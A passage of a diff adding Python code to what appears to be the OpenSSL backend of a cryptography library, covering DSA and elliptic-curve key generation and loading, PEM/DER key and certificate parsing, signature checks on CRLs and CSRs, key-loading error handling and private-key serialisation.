PUBLIC_KEY_TYPES: + """ + Return the appropriate type of PublicKey given an evp_pkey cdata + pointer. + """ + + key_type = self._lib.EVP_PKEY_id(evp_pkey) + + if key_type == self._lib.EVP_PKEY_RSA: + rsa_cdata = self._lib.EVP_PKEY_get1_RSA(evp_pkey) + self.openssl_assert(rsa_cdata != self._ffi.NULL) + rsa_cdata = self._ffi.gc(rsa_cdata, self._lib.RSA_free) + return _RSAPublicKey(self, rsa_cdata, evp_pkey) + elif key_type == self._lib.EVP_PKEY_DSA: + dsa_cdata = self._lib.EVP_PKEY_get1_DSA(evp_pkey) + self.openssl_assert(dsa_cdata != self._ffi.NULL) + dsa_cdata = self._ffi.gc(dsa_cdata, self._lib.DSA_free) + return _DSAPublicKey(self, dsa_cdata, evp_pkey) + elif key_type == self._lib.EVP_PKEY_EC: + ec_cdata = self._lib.EVP_PKEY_get1_EC_KEY(evp_pkey) + if ec_cdata == self._ffi.NULL: + errors = self._consume_errors_with_text() + raise ValueError("Unable to load EC key", errors) + ec_cdata = self._ffi.gc(ec_cdata, self._lib.EC_KEY_free) + return _EllipticCurvePublicKey(self, ec_cdata, evp_pkey) + elif key_type in self._dh_types: + dh_cdata = self._lib.EVP_PKEY_get1_DH(evp_pkey) + self.openssl_assert(dh_cdata != self._ffi.NULL) + dh_cdata = self._ffi.gc(dh_cdata, self._lib.DH_free) + return _DHPublicKey(self, dh_cdata, evp_pkey) + elif key_type == getattr(self._lib, "EVP_PKEY_ED25519", None): + # EVP_PKEY_ED25519 is not present in OpenSSL < 1.1.1 + return _Ed25519PublicKey(self, evp_pkey) + elif key_type == getattr(self._lib, "EVP_PKEY_X448", None): + # EVP_PKEY_X448 is not present in OpenSSL < 1.1.1 + return _X448PublicKey(self, evp_pkey) + elif key_type == getattr(self._lib, "EVP_PKEY_X25519", None): + # EVP_PKEY_X25519 is not present in OpenSSL < 1.1.0 + return _X25519PublicKey(self, evp_pkey) + elif key_type == getattr(self._lib, "EVP_PKEY_ED448", None): + # EVP_PKEY_X25519 is not present in OpenSSL < 1.1.1 + return _Ed448PublicKey(self, evp_pkey) + else: + raise UnsupportedAlgorithm("Unsupported key type.") + + def _oaep_hash_supported(self, algorithm: hashes.HashAlgorithm) -> bool: + return isinstance( + algorithm, + ( + hashes.SHA1, + hashes.SHA224, + hashes.SHA256, + hashes.SHA384, + hashes.SHA512, + ), + ) + + def rsa_padding_supported(self, padding: AsymmetricPadding) -> bool: + if isinstance(padding, PKCS1v15): + return True + elif isinstance(padding, PSS) and isinstance(padding._mgf, MGF1): + # SHA1 is permissible in MGF1 in FIPS even when SHA1 is blocked + # as signature algorithm. + if self._fips_enabled and isinstance( + padding._mgf._algorithm, hashes.SHA1 + ): + return True + else: + return self.hash_supported(padding._mgf._algorithm) + elif isinstance(padding, OAEP) and isinstance(padding._mgf, MGF1): + return self._oaep_hash_supported( + padding._mgf._algorithm + ) and self._oaep_hash_supported(padding._algorithm) + else: + return False + + def generate_dsa_parameters(self, key_size: int) -> dsa.DSAParameters: + if key_size not in (1024, 2048, 3072, 4096): + raise ValueError( + "Key size must be 1024, 2048, 3072, or 4096 bits." + ) + + ctx = self._lib.DSA_new() + self.openssl_assert(ctx != self._ffi.NULL) + ctx = self._ffi.gc(ctx, self._lib.DSA_free) + + res = self._lib.DSA_generate_parameters_ex( + ctx, + key_size, + self._ffi.NULL, + 0, + self._ffi.NULL, + self._ffi.NULL, + self._ffi.NULL, + ) + + self.openssl_assert(res == 1) + + return _DSAParameters(self, ctx) + + def generate_dsa_private_key( + self, parameters: dsa.DSAParameters + ) -> dsa.DSAPrivateKey: + ctx = self._lib.DSAparams_dup( + parameters._dsa_cdata # type: ignore[attr-defined] + ) + self.openssl_assert(ctx != self._ffi.NULL) + ctx = self._ffi.gc(ctx, self._lib.DSA_free) + self._lib.DSA_generate_key(ctx) + evp_pkey = self._dsa_cdata_to_evp_pkey(ctx) + + return _DSAPrivateKey(self, ctx, evp_pkey) + + def generate_dsa_private_key_and_parameters( + self, key_size: int + ) -> dsa.DSAPrivateKey: + parameters = self.generate_dsa_parameters(key_size) + return self.generate_dsa_private_key(parameters) + + def _dsa_cdata_set_values(self, dsa_cdata, p, q, g, pub_key, priv_key): + res = self._lib.DSA_set0_pqg(dsa_cdata, p, q, g) + self.openssl_assert(res == 1) + res = self._lib.DSA_set0_key(dsa_cdata, pub_key, priv_key) + self.openssl_assert(res == 1) + + def load_dsa_private_numbers( + self, numbers: dsa.DSAPrivateNumbers + ) -> dsa.DSAPrivateKey: + dsa._check_dsa_private_numbers(numbers) + parameter_numbers = numbers.public_numbers.parameter_numbers + + dsa_cdata = self._lib.DSA_new() + self.openssl_assert(dsa_cdata != self._ffi.NULL) + dsa_cdata = self._ffi.gc(dsa_cdata, self._lib.DSA_free) + + p = self._int_to_bn(parameter_numbers.p) + q = self._int_to_bn(parameter_numbers.q) + g = self._int_to_bn(parameter_numbers.g) + pub_key = self._int_to_bn(numbers.public_numbers.y) + priv_key = self._int_to_bn(numbers.x) + self._dsa_cdata_set_values(dsa_cdata, p, q, g, pub_key, priv_key) + + evp_pkey = self._dsa_cdata_to_evp_pkey(dsa_cdata) + + return _DSAPrivateKey(self, dsa_cdata, evp_pkey) + + def load_dsa_public_numbers( + self, numbers: dsa.DSAPublicNumbers + ) -> dsa.DSAPublicKey: + dsa._check_dsa_parameters(numbers.parameter_numbers) + dsa_cdata = self._lib.DSA_new() + self.openssl_assert(dsa_cdata != self._ffi.NULL) + dsa_cdata = self._ffi.gc(dsa_cdata, self._lib.DSA_free) + + p = self._int_to_bn(numbers.parameter_numbers.p) + q = self._int_to_bn(numbers.parameter_numbers.q) + g = self._int_to_bn(numbers.parameter_numbers.g) + pub_key = self._int_to_bn(numbers.y) + priv_key = self._ffi.NULL + self._dsa_cdata_set_values(dsa_cdata, p, q, g, pub_key, priv_key) + + evp_pkey = self._dsa_cdata_to_evp_pkey(dsa_cdata) + + return _DSAPublicKey(self, dsa_cdata, evp_pkey) + + def load_dsa_parameter_numbers( + self, numbers: dsa.DSAParameterNumbers + ) -> dsa.DSAParameters: + dsa._check_dsa_parameters(numbers) + dsa_cdata = self._lib.DSA_new() + self.openssl_assert(dsa_cdata != self._ffi.NULL) + dsa_cdata = self._ffi.gc(dsa_cdata, self._lib.DSA_free) + + p = self._int_to_bn(numbers.p) + q = self._int_to_bn(numbers.q) + g = self._int_to_bn(numbers.g) + res = self._lib.DSA_set0_pqg(dsa_cdata, p, q, g) + self.openssl_assert(res == 1) + + return _DSAParameters(self, dsa_cdata) + + def _dsa_cdata_to_evp_pkey(self, dsa_cdata): + evp_pkey = self._create_evp_pkey_gc() + res = self._lib.EVP_PKEY_set1_DSA(evp_pkey, dsa_cdata) + self.openssl_assert(res == 1) + return evp_pkey + + def dsa_supported(self) -> bool: + return not self._fips_enabled + + def dsa_hash_supported(self, algorithm: hashes.HashAlgorithm) -> bool: + if not self.dsa_supported(): + return False + return self.signature_hash_supported(algorithm) + + def cmac_algorithm_supported(self, algorithm) -> bool: + return self.cipher_supported( + algorithm, CBC(b"\x00" * algorithm.block_size) + ) + + def create_cmac_ctx(self, algorithm: BlockCipherAlgorithm) -> _CMACContext: + return _CMACContext(self, algorithm) + + def load_pem_private_key( + self, data: bytes, password: typing.Optional[bytes] + ) -> PRIVATE_KEY_TYPES: + return self._load_key( + self._lib.PEM_read_bio_PrivateKey, + self._evp_pkey_to_private_key, + data, + password, + ) + + def load_pem_public_key(self, data: bytes) -> PUBLIC_KEY_TYPES: + mem_bio = self._bytes_to_bio(data) + # In OpenSSL 3.0.x the PEM_read_bio_PUBKEY function will invoke + # the default password callback if you pass an encrypted private + # key. This is very, very, very bad as the default callback can + # trigger an interactive console prompt, which will hang the + # Python process. We therefore provide our own callback to + # catch this and error out properly. + userdata = self._ffi.new("CRYPTOGRAPHY_PASSWORD_DATA *") + evp_pkey = self._lib.PEM_read_bio_PUBKEY( + mem_bio.bio, + self._ffi.NULL, + self._ffi.addressof( + self._lib._original_lib, "Cryptography_pem_password_cb" + ), + userdata, + ) + if evp_pkey != self._ffi.NULL: + evp_pkey = self._ffi.gc(evp_pkey, self._lib.EVP_PKEY_free) + return self._evp_pkey_to_public_key(evp_pkey) + else: + # It's not a (RSA/DSA/ECDSA) subjectPublicKeyInfo, but we still + # need to check to see if it is a pure PKCS1 RSA public key (not + # embedded in a subjectPublicKeyInfo) + self._consume_errors() + res = self._lib.BIO_reset(mem_bio.bio) + self.openssl_assert(res == 1) + rsa_cdata = self._lib.PEM_read_bio_RSAPublicKey( + mem_bio.bio, + self._ffi.NULL, + self._ffi.addressof( + self._lib._original_lib, "Cryptography_pem_password_cb" + ), + userdata, + ) + if rsa_cdata != self._ffi.NULL: + rsa_cdata = self._ffi.gc(rsa_cdata, self._lib.RSA_free) + evp_pkey = self._rsa_cdata_to_evp_pkey(rsa_cdata) + return _RSAPublicKey(self, rsa_cdata, evp_pkey) + else: + self._handle_key_loading_error() + + def load_pem_parameters(self, data: bytes) -> dh.DHParameters: + mem_bio = self._bytes_to_bio(data) + # only DH is supported currently + dh_cdata = self._lib.PEM_read_bio_DHparams( + mem_bio.bio, self._ffi.NULL, self._ffi.NULL, self._ffi.NULL + ) + if dh_cdata != self._ffi.NULL: + dh_cdata = self._ffi.gc(dh_cdata, self._lib.DH_free) + return _DHParameters(self, dh_cdata) + else: + self._handle_key_loading_error() + + def load_der_private_key( + self, data: bytes, password: typing.Optional[bytes] + ) -> PRIVATE_KEY_TYPES: + # OpenSSL has a function called d2i_AutoPrivateKey that in theory + # handles this automatically, however it doesn't handle encrypted + # private keys. Instead we try to load the key two different ways. + # First we'll try to load it as a traditional key. + bio_data = self._bytes_to_bio(data) + key = self._evp_pkey_from_der_traditional_key(bio_data, password) + if key: + return self._evp_pkey_to_private_key(key) + else: + # Finally we try to load it with the method that handles encrypted + # PKCS8 properly. + return self._load_key( + self._lib.d2i_PKCS8PrivateKey_bio, + self._evp_pkey_to_private_key, + data, + password, + ) + + def _evp_pkey_from_der_traditional_key(self, bio_data, password): + key = self._lib.d2i_PrivateKey_bio(bio_data.bio, self._ffi.NULL) + if key != self._ffi.NULL: + # In OpenSSL 3.0.0-alpha15 there exist scenarios where the key will + # successfully load but errors are still put on the stack. Tracked + # as https://github.com/openssl/openssl/issues/14996 + self._consume_errors() + + key = self._ffi.gc(key, self._lib.EVP_PKEY_free) + if password is not None: + raise TypeError( + "Password was given but private key is not encrypted." + ) + + return key + else: + self._consume_errors() + return None + + def load_der_public_key(self, data: bytes) -> PUBLIC_KEY_TYPES: + mem_bio = self._bytes_to_bio(data) + evp_pkey = self._lib.d2i_PUBKEY_bio(mem_bio.bio, self._ffi.NULL) + if evp_pkey != self._ffi.NULL: + evp_pkey = self._ffi.gc(evp_pkey, self._lib.EVP_PKEY_free) + return self._evp_pkey_to_public_key(evp_pkey) + else: + # It's not a (RSA/DSA/ECDSA) subjectPublicKeyInfo, but we still + # need to check to see if it is a pure PKCS1 RSA public key (not + # embedded in a subjectPublicKeyInfo) + self._consume_errors() + res = self._lib.BIO_reset(mem_bio.bio) + self.openssl_assert(res == 1) + rsa_cdata = self._lib.d2i_RSAPublicKey_bio( + mem_bio.bio, self._ffi.NULL + ) + if rsa_cdata != self._ffi.NULL: + rsa_cdata = self._ffi.gc(rsa_cdata, self._lib.RSA_free) + evp_pkey = self._rsa_cdata_to_evp_pkey(rsa_cdata) + return _RSAPublicKey(self, rsa_cdata, evp_pkey) + else: + self._handle_key_loading_error() + + def load_der_parameters(self, data: bytes) -> dh.DHParameters: + mem_bio = self._bytes_to_bio(data) + dh_cdata = self._lib.d2i_DHparams_bio(mem_bio.bio, self._ffi.NULL) + if dh_cdata != self._ffi.NULL: + dh_cdata = self._ffi.gc(dh_cdata, self._lib.DH_free) + return _DHParameters(self, dh_cdata) + elif self._lib.Cryptography_HAS_EVP_PKEY_DHX: + # We check to see if the is dhx. + self._consume_errors() + res = self._lib.BIO_reset(mem_bio.bio) + self.openssl_assert(res == 1) + dh_cdata = self._lib.Cryptography_d2i_DHxparams_bio( + mem_bio.bio, self._ffi.NULL + ) + if dh_cdata != self._ffi.NULL: + dh_cdata = self._ffi.gc(dh_cdata, self._lib.DH_free) + return _DHParameters(self, dh_cdata) + + self._handle_key_loading_error() + + def _cert2ossl(self, cert: x509.Certificate) -> typing.Any: + data = cert.public_bytes(serialization.Encoding.DER) + mem_bio = self._bytes_to_bio(data) + x509 = self._lib.d2i_X509_bio(mem_bio.bio, self._ffi.NULL) + self.openssl_assert(x509 != self._ffi.NULL) + x509 = self._ffi.gc(x509, self._lib.X509_free) + return x509 + + def _ossl2cert(self, x509: typing.Any) -> x509.Certificate: + bio = self._create_mem_bio_gc() + res = self._lib.i2d_X509_bio(bio, x509) + self.openssl_assert(res == 1) + return rust_x509.load_der_x509_certificate(self._read_mem_bio(bio)) + + def _csr2ossl(self, csr: x509.CertificateSigningRequest) -> typing.Any: + data = csr.public_bytes(serialization.Encoding.DER) + mem_bio = self._bytes_to_bio(data) + x509_req = self._lib.d2i_X509_REQ_bio(mem_bio.bio, self._ffi.NULL) + self.openssl_assert(x509_req != self._ffi.NULL) + x509_req = self._ffi.gc(x509_req, self._lib.X509_REQ_free) + return x509_req + + def _ossl2csr( + self, x509_req: typing.Any + ) -> x509.CertificateSigningRequest: + bio = self._create_mem_bio_gc() + res = self._lib.i2d_X509_REQ_bio(bio, x509_req) + self.openssl_assert(res == 1) + return rust_x509.load_der_x509_csr(self._read_mem_bio(bio)) + + def _crl2ossl(self, crl: x509.CertificateRevocationList) -> typing.Any: + data = crl.public_bytes(serialization.Encoding.DER) + mem_bio = self._bytes_to_bio(data) + x509_crl = self._lib.d2i_X509_CRL_bio(mem_bio.bio, self._ffi.NULL) + self.openssl_assert(x509_crl != self._ffi.NULL) + x509_crl = self._ffi.gc(x509_crl, self._lib.X509_CRL_free) + return x509_crl + + def _ossl2crl( + self, x509_crl: typing.Any + ) -> x509.CertificateRevocationList: + bio = self._create_mem_bio_gc() + res = self._lib.i2d_X509_CRL_bio(bio, x509_crl) + self.openssl_assert(res == 1) + return rust_x509.load_der_x509_crl(self._read_mem_bio(bio)) + + def _crl_is_signature_valid( + self, + crl: x509.CertificateRevocationList, + public_key: CERTIFICATE_ISSUER_PUBLIC_KEY_TYPES, + ) -> bool: + if not isinstance( + public_key, + ( + _DSAPublicKey, + _RSAPublicKey, + _EllipticCurvePublicKey, + ), + ): + raise TypeError( + "Expecting one of DSAPublicKey, RSAPublicKey," + " or EllipticCurvePublicKey." + ) + x509_crl = self._crl2ossl(crl) + res = self._lib.X509_CRL_verify(x509_crl, public_key._evp_pkey) + + if res != 1: + self._consume_errors() + return False + + return True + + def _csr_is_signature_valid( + self, csr: x509.CertificateSigningRequest + ) -> bool: + x509_req = self._csr2ossl(csr) + pkey = self._lib.X509_REQ_get_pubkey(x509_req) + self.openssl_assert(pkey != self._ffi.NULL) + pkey = self._ffi.gc(pkey, self._lib.EVP_PKEY_free) + res = self._lib.X509_REQ_verify(x509_req, pkey) + + if res != 1: + self._consume_errors() + return False + + return True + + def _check_keys_correspond(self, key1, key2): + if self._lib.EVP_PKEY_cmp(key1._evp_pkey, key2._evp_pkey) != 1: + raise ValueError("Keys do not correspond") + + def _load_key(self, openssl_read_func, convert_func, data, password): + mem_bio = self._bytes_to_bio(data) + + userdata = self._ffi.new("CRYPTOGRAPHY_PASSWORD_DATA *") + if password is not None: + utils._check_byteslike("password", password) + password_ptr = self._ffi.from_buffer(password) + userdata.password = password_ptr + userdata.length = len(password) + + evp_pkey = openssl_read_func( + mem_bio.bio, + self._ffi.NULL, + self._ffi.addressof( + self._lib._original_lib, "Cryptography_pem_password_cb" + ), + userdata, + ) + + if evp_pkey == self._ffi.NULL: + if userdata.error != 0: + self._consume_errors() + if userdata.error == -1: + raise TypeError( + "Password was not given but private key is encrypted" + ) + else: + assert userdata.error == -2 + raise ValueError( + "Passwords longer than {} bytes are not supported " + "by this backend.".format(userdata.maxsize - 1) + ) + else: + self._handle_key_loading_error() + + # In OpenSSL 3.0.0-alpha15 there exist scenarios where the key will + # successfully load but errors are still put on the stack. Tracked + # as https://github.com/openssl/openssl/issues/14996 + self._consume_errors() + + evp_pkey = self._ffi.gc(evp_pkey, self._lib.EVP_PKEY_free) + + if password is not None and userdata.called == 0: + raise TypeError( + "Password was given but private key is not encrypted." + ) + + assert ( + password is not None and userdata.called == 1 + ) or password is None + + return convert_func(evp_pkey) + + def _handle_key_loading_error(self) -> typing.NoReturn: + errors = self._consume_errors() + + if not errors: + raise ValueError( + "Could not deserialize key data. The data may be in an " + "incorrect format or it may be encrypted with an unsupported " + "algorithm." + ) + + elif ( + errors[0]._lib_reason_match( + self._lib.ERR_LIB_EVP, self._lib.EVP_R_BAD_DECRYPT + ) + or errors[0]._lib_reason_match( + self._lib.ERR_LIB_PKCS12, + self._lib.PKCS12_R_PKCS12_CIPHERFINAL_ERROR, + ) + or ( + self._lib.Cryptography_HAS_PROVIDERS + and errors[0]._lib_reason_match( + self._lib.ERR_LIB_PROV, + self._lib.PROV_R_BAD_DECRYPT, + ) + ) + ): + raise ValueError("Bad decrypt. Incorrect password?") + + elif any( + error._lib_reason_match( + self._lib.ERR_LIB_EVP, + self._lib.EVP_R_UNSUPPORTED_PRIVATE_KEY_ALGORITHM, + ) + for error in errors + ): + raise ValueError("Unsupported public key algorithm.") + + else: + errors_with_text = binding._errors_with_text(errors) + raise ValueError( + "Could not deserialize key data. The data may be in an " + "incorrect format, it may be encrypted with an unsupported " + "algorithm, or it may be an unsupported key type (e.g. EC " + "curves with explicit parameters).", + errors_with_text, + ) + + def elliptic_curve_supported(self, curve: ec.EllipticCurve) -> bool: + try: + curve_nid = self._elliptic_curve_to_nid(curve) + except UnsupportedAlgorithm: + curve_nid = self._lib.NID_undef + + group = self._lib.EC_GROUP_new_by_curve_name(curve_nid) + + if group == self._ffi.NULL: + self._consume_errors() + return False + else: + self.openssl_assert(curve_nid != self._lib.NID_undef) + self._lib.EC_GROUP_free(group) + return True + + def elliptic_curve_signature_algorithm_supported( + self, + signature_algorithm: ec.EllipticCurveSignatureAlgorithm, + curve: ec.EllipticCurve, + ) -> bool: + # We only support ECDSA right now. + if not isinstance(signature_algorithm, ec.ECDSA): + return False + + return self.elliptic_curve_supported(curve) + + def generate_elliptic_curve_private_key( + self, curve: ec.EllipticCurve + ) -> ec.EllipticCurvePrivateKey: + """ + Generate a new private key on the named curve. + """ + + if self.elliptic_curve_supported(curve): + ec_cdata = self._ec_key_new_by_curve(curve) + + res = self._lib.EC_KEY_generate_key(ec_cdata) + self.openssl_assert(res == 1) + + evp_pkey = self._ec_cdata_to_evp_pkey(ec_cdata) + + return _EllipticCurvePrivateKey(self, ec_cdata, evp_pkey) + else: + raise UnsupportedAlgorithm( + "Backend object does not support {}.".format(curve.name), + _Reasons.UNSUPPORTED_ELLIPTIC_CURVE, + ) + + def load_elliptic_curve_private_numbers( + self, numbers: ec.EllipticCurvePrivateNumbers + ) -> ec.EllipticCurvePrivateKey: + public = numbers.public_numbers + + ec_cdata = self._ec_key_new_by_curve(public.curve) + + private_value = self._ffi.gc( + self._int_to_bn(numbers.private_value), self._lib.BN_clear_free + ) + res = self._lib.EC_KEY_set_private_key(ec_cdata, private_value) + if res != 1: + self._consume_errors() + raise ValueError("Invalid EC key.") + + self._ec_key_set_public_key_affine_coordinates( + ec_cdata, public.x, public.y + ) + + evp_pkey = self._ec_cdata_to_evp_pkey(ec_cdata) + + return _EllipticCurvePrivateKey(self, ec_cdata, evp_pkey) + + def load_elliptic_curve_public_numbers( + self, numbers: ec.EllipticCurvePublicNumbers + ) -> ec.EllipticCurvePublicKey: + ec_cdata = self._ec_key_new_by_curve(numbers.curve) + self._ec_key_set_public_key_affine_coordinates( + ec_cdata, numbers.x, numbers.y + ) + evp_pkey = self._ec_cdata_to_evp_pkey(ec_cdata) + + return _EllipticCurvePublicKey(self, ec_cdata, evp_pkey) + + def load_elliptic_curve_public_bytes( + self, curve: ec.EllipticCurve, point_bytes: bytes + ) -> ec.EllipticCurvePublicKey: + ec_cdata = self._ec_key_new_by_curve(curve) + group = self._lib.EC_KEY_get0_group(ec_cdata) + self.openssl_assert(group != self._ffi.NULL) + point = self._lib.EC_POINT_new(group) + self.openssl_assert(point != self._ffi.NULL) + point = self._ffi.gc(point, self._lib.EC_POINT_free) + with self._tmp_bn_ctx() as bn_ctx: + res = self._lib.EC_POINT_oct2point( + group, point, point_bytes, len(point_bytes), bn_ctx + ) + if res != 1: + self._consume_errors() + raise ValueError("Invalid public bytes for the given curve") + + res = self._lib.EC_KEY_set_public_key(ec_cdata, point) + self.openssl_assert(res == 1) + evp_pkey = self._ec_cdata_to_evp_pkey(ec_cdata) + return _EllipticCurvePublicKey(self, ec_cdata, evp_pkey) + + def derive_elliptic_curve_private_key( + self, private_value: int, curve: ec.EllipticCurve + ) -> ec.EllipticCurvePrivateKey: + ec_cdata = self._ec_key_new_by_curve(curve) + + get_func, group = self._ec_key_determine_group_get_func(ec_cdata) + + point = self._lib.EC_POINT_new(group) + self.openssl_assert(point != self._ffi.NULL) + point = self._ffi.gc(point, self._lib.EC_POINT_free) + + value = self._int_to_bn(private_value) + value = self._ffi.gc(value, self._lib.BN_clear_free) + + with self._tmp_bn_ctx() as bn_ctx: + res = self._lib.EC_POINT_mul( + group, point, value, self._ffi.NULL, self._ffi.NULL, bn_ctx + ) + self.openssl_assert(res == 1) + + bn_x = self._lib.BN_CTX_get(bn_ctx) + bn_y = self._lib.BN_CTX_get(bn_ctx) + + res = get_func(group, point, bn_x, bn_y, bn_ctx) + if res != 1: + self._consume_errors() + raise ValueError("Unable to derive key from private_value") + + res = self._lib.EC_KEY_set_public_key(ec_cdata, point) + self.openssl_assert(res == 1) + private = self._int_to_bn(private_value) + private = self._ffi.gc(private, self._lib.BN_clear_free) + res = self._lib.EC_KEY_set_private_key(ec_cdata, private) + self.openssl_assert(res == 1) + + evp_pkey = self._ec_cdata_to_evp_pkey(ec_cdata) + + return _EllipticCurvePrivateKey(self, ec_cdata, evp_pkey) + + def _ec_key_new_by_curve(self, curve: ec.EllipticCurve): + curve_nid = self._elliptic_curve_to_nid(curve) + return self._ec_key_new_by_curve_nid(curve_nid) + + def _ec_key_new_by_curve_nid(self, curve_nid: int): + ec_cdata = self._lib.EC_KEY_new_by_curve_name(curve_nid) + self.openssl_assert(ec_cdata != self._ffi.NULL) + return self._ffi.gc(ec_cdata, self._lib.EC_KEY_free) + + def elliptic_curve_exchange_algorithm_supported( + self, algorithm: ec.ECDH, curve: ec.EllipticCurve + ) -> bool: + if self._fips_enabled and not isinstance( + curve, self._fips_ecdh_curves + ): + return False + + return self.elliptic_curve_supported(curve) and isinstance( + algorithm, ec.ECDH + ) + + def _ec_cdata_to_evp_pkey(self, ec_cdata): + evp_pkey = self._create_evp_pkey_gc() + res = self._lib.EVP_PKEY_set1_EC_KEY(evp_pkey, ec_cdata) + self.openssl_assert(res == 1) + return evp_pkey + + def _elliptic_curve_to_nid(self, curve: ec.EllipticCurve) -> int: + """ + Get the NID for a curve name. + """ + + curve_aliases = {"secp192r1": "prime192v1", "secp256r1": "prime256v1"} + + curve_name = curve_aliases.get(curve.name, curve.name) + + curve_nid = self._lib.OBJ_sn2nid(curve_name.encode()) + if curve_nid == self._lib.NID_undef: + raise UnsupportedAlgorithm( + "{} is not a supported elliptic curve".format(curve.name), + _Reasons.UNSUPPORTED_ELLIPTIC_CURVE, + ) + return curve_nid + + @contextmanager + def _tmp_bn_ctx(self): + bn_ctx = self._lib.BN_CTX_new() + self.openssl_assert(bn_ctx != self._ffi.NULL) + bn_ctx = self._ffi.gc(bn_ctx, self._lib.BN_CTX_free) + self._lib.BN_CTX_start(bn_ctx) + try: + yield bn_ctx + finally: + self._lib.BN_CTX_end(bn_ctx) + + def _ec_key_determine_group_get_func(self, ctx): + """ + Given an EC_KEY determine the group and what function is required to + get point coordinates. + """ + self.openssl_assert(ctx != self._ffi.NULL) + + nid_two_field = self._lib.OBJ_sn2nid(b"characteristic-two-field") + self.openssl_assert(nid_two_field != self._lib.NID_undef) + + group = self._lib.EC_KEY_get0_group(ctx) + self.openssl_assert(group != self._ffi.NULL) + + method = self._lib.EC_GROUP_method_of(group) + self.openssl_assert(method != self._ffi.NULL) + + nid = self._lib.EC_METHOD_get_field_type(method) + self.openssl_assert(nid != self._lib.NID_undef) + + if nid == nid_two_field and self._lib.Cryptography_HAS_EC2M: + get_func = self._lib.EC_POINT_get_affine_coordinates_GF2m + else: + get_func = self._lib.EC_POINT_get_affine_coordinates_GFp + + assert get_func + + return get_func, group + + def _ec_key_set_public_key_affine_coordinates(self, ctx, x: int, y: int): + """ + Sets the public key point in the EC_KEY context to the affine x and y + values. + """ + + if x < 0 or y < 0: + raise ValueError( + "Invalid EC key. Both x and y must be non-negative." + ) + + x = self._ffi.gc(self._int_to_bn(x), self._lib.BN_free) + y = self._ffi.gc(self._int_to_bn(y), self._lib.BN_free) + res = self._lib.EC_KEY_set_public_key_affine_coordinates(ctx, x, y) + if res != 1: + self._consume_errors() + raise ValueError("Invalid EC key.") + + def _private_key_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PrivateFormat, + encryption_algorithm: serialization.KeySerializationEncryption, + key, + evp_pkey, + cdata, + ) -> bytes: + # validate argument types + if not isinstance(encoding, serialization.Encoding): + raise TypeError("encoding must be an item from the Encoding enum") + if not isinstance(format, serialization.PrivateFormat): + raise TypeError( + "format must be an item from the PrivateFormat enum" + ) + if not isinstance( + encryption_algorithm, serialization.KeySerializationEncryption + ): + raise TypeError( + "Encryption algorithm must be a KeySerializationEncryption " + "instance" + ) + + # validate password + if isinstance(encryption_algorithm, serialization.NoEncryption): + password = b"" + elif isinstance( + encryption_algorithm, serialization.BestAvailableEncryption + ): + password = encryption_algorithm.password + if len(password) > 1023: + raise ValueError( + "Passwords longer than 1023 bytes are not supported by " + "this backend" + ) + else: + raise ValueError("Unsupported encryption type") + + # PKCS8 + PEM/DER + if format is serialization.PrivateFormat.PKCS8: + if encoding is serialization.Encoding.PEM: + write_bio = self._lib.PEM_write_bio_PKCS8PrivateKey + elif encoding is serialization.Encoding.DER: + write_bio = self._lib.i2d_PKCS8PrivateKey_bio + else: + raise ValueError("Unsupported encoding for PKCS8") + return self._private_key_bytes_via_bio( + write_bio, evp_pkey, password + ) + + # TraditionalOpenSSL + PEM/DER + if format is serialization.PrivateFormat.TraditionalOpenSSL: + if self._fips_enabled and not isinstance( + encryption_algorithm, serialization.NoEncryption + ): + raise ValueError( + "Encrypted traditional OpenSSL format is not " + "supported in FIPS mode." + ) + key_type = self._lib.EVP_PKEY_id(evp_pkey) + + if encoding is serialization.Encoding.PEM: + if key_type == self._lib.EVP_PKEY_RSA: + write_bio = self._lib.PEM_write_bio_RSAPrivateKey + elif key_type == self._lib.EVP_PKEY_DSA: + write_bio = self._lib.PEM_write_bio_DSAPrivateKey + elif key_type == self._lib.EVP_PKEY_EC: + write_bio = self._lib.PEM_write_bio_ECPrivateKey + else: + raise ValueError( + "Unsupported key type for TraditionalOpenSSL" + ) + return self._private_key_bytes_via_bio( + write_bio, cdata, password + ) + + if encoding is serialization.Encoding.DER: + if password: + raise ValueError( + "Encryption is not supported for DER encoded " + "traditional OpenSSL keys" + ) + if key_type == self._lib.EVP_PKEY_RSA: + write_bio = self._lib.i2d_RSAPrivateKey_bio + elif key_type == self._lib.EVP_PKEY_EC: + write_bio = self._lib.i2d_ECPrivateKey_bio + elif key_type == self._lib.EVP_PKEY_DSA: + write_bio = self._lib.i2d_DSAPrivateKey_bio + else: + raise ValueError( + "Unsupported key type for TraditionalOpenSSL" + ) + return self._bio_func_output(write_bio, cdata) + + raise ValueError("Unsupported encoding for TraditionalOpenSSL") + + # OpenSSH + PEM + if format is serialization.PrivateFormat.OpenSSH: + if encoding is serialization.Encoding.PEM: + return ssh.serialize_ssh_private_key(key, password) + + raise ValueError( + "OpenSSH private key format can only be used" + " with PEM encoding" + ) + + # Anything that key-specific code was supposed to handle earlier, + # like Raw. + raise ValueError("format is invalid with this key") + + def _private_key_bytes_via_bio(self, write_bio, evp_pkey, password): + if not password: + evp_cipher = self._ffi.NULL + else: + # This is a curated value that we will update over time. + evp_cipher = self._lib.EVP_get_cipherbyname(b"aes-256-cbc") + + return self._bio_func_output( + write_bio, + evp_pkey, + evp_cipher, + password, + len(password), + self._ffi.NULL, + self._ffi.NULL, + ) + + def _bio_func_output(self, write_bio, *args): + bio = self._create_mem_bio_gc() + res = write_bio(bio, *args) + self.openssl_assert(res == 1) + return self._read_mem_bio(bio) + + def _public_key_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PublicFormat, + key, + evp_pkey, + cdata, + ) -> bytes: + if not isinstance(encoding, serialization.Encoding): + raise TypeError("encoding must be an item from the Encoding enum") + if not isinstance(format, serialization.PublicFormat): + raise TypeError( + "format must be an item from the PublicFormat enum" + ) + + # SubjectPublicKeyInfo + PEM/DER + if format is serialization.PublicFormat.SubjectPublicKeyInfo: + if encoding is serialization.Encoding.PEM: + write_bio = self._lib.PEM_write_bio_PUBKEY + elif encoding is serialization.Encoding.DER: + write_bio = self._lib.i2d_PUBKEY_bio + else: + raise ValueError( + "SubjectPublicKeyInfo works only with PEM or DER encoding" + ) + return self._bio_func_output(write_bio, evp_pkey) + + # PKCS1 + PEM/DER + if format is serialization.PublicFormat.PKCS1: + # Only RSA is supported here. + key_type = self._lib.EVP_PKEY_id(evp_pkey) + if key_type != self._lib.EVP_PKEY_RSA: + raise ValueError("PKCS1 format is supported only for RSA keys") + + if encoding is serialization.Encoding.PEM: + write_bio = 